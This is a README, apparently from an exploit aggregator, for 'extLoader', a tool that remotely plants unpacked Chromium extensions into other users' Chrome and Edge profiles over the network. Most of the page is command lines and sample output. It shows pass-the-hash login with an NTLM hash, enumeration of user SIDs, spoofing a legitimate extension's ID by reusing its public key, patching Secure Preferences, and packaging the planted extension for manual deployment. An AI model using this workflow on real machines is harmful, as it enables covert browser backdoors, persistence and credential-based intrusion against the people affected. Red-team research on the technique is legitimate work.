## https://sploitus.com/exploit?id=55E42F82-510D-50F8-8ACA-869F9D29D2BE
# extLoader
A small toolkit for managing and deploying unpacked Chromium extensions.
> Find out more in the following blogpost: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways
## Installation
### Direct install (pipx)
```bash
pipx install .
extloader --help
```
> Use `pipx` for an isolated install targeting Python 3.10+.
### Development setup (uv)
```bash
uv venv
source .venv/bin/activate
uv pip install -e .
```
## Authentication Options
- Password: `-p/--password`
- Hash: `-H/--hash` (LM:NT format or just NT)
- Domain: `-d/--domain` (defaults to WORKGROUP)
## Common Parameters
- `-t, --target`: Target IP/hostname
- `-u, --username`: Username
- `-i, --index`: User index from check command
- `--debug`: Enable debug logging
## Usage
Here's a step-by-step example of deploying an extension:
1. First, check available targets:
```bash
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local
โโโโโโโโโโณโโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Index โ Browser โ User (SID) โ
โกโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฉ
โ 1 โ Chrome โ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122) โ
โ 2 โ Microsoft Edge โ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122) โ
โโโโโโโโโโดโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
> When running exploit on a different machine, always run the `check` command before to refresh the context (`available_targets.json`).
2. Prepare the manifest (sign or spoof an ID):
```bash
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension
```
> To spoof an existing extension ID, skip the command above and set the manifest
> `key` to the base64 public key of the extension you are mimicking. Reusing that
> key keeps the CRX ID unchanged.
3. Deploy the extension:
```bash
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
```
4.(Alternative) Package for manual deployment:
```bash
# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"
# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions
```
> `--prefs-file` expects the browser profile preferences you backed up (Chrome/Edge store them as `Secure Preferences`, other Chromium browsers use `Preferences`). The loader copies it, patches it, and includes both the modified and untouched versions in the package.
```text
โโโ extension/
โ โโโ chrome-mv3/
โโโ preferences/
โ โโโ brave/
โ โโโ chrome/
โ โโโ chromium/
[...]
โโโ info.json
```
5. Restore original preferences if needed:
```bash
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
```
## TODO
- Kerberos support
- nxc module
- Adapt `package` workflow for Linux
- Adapt `package` worflow for macOS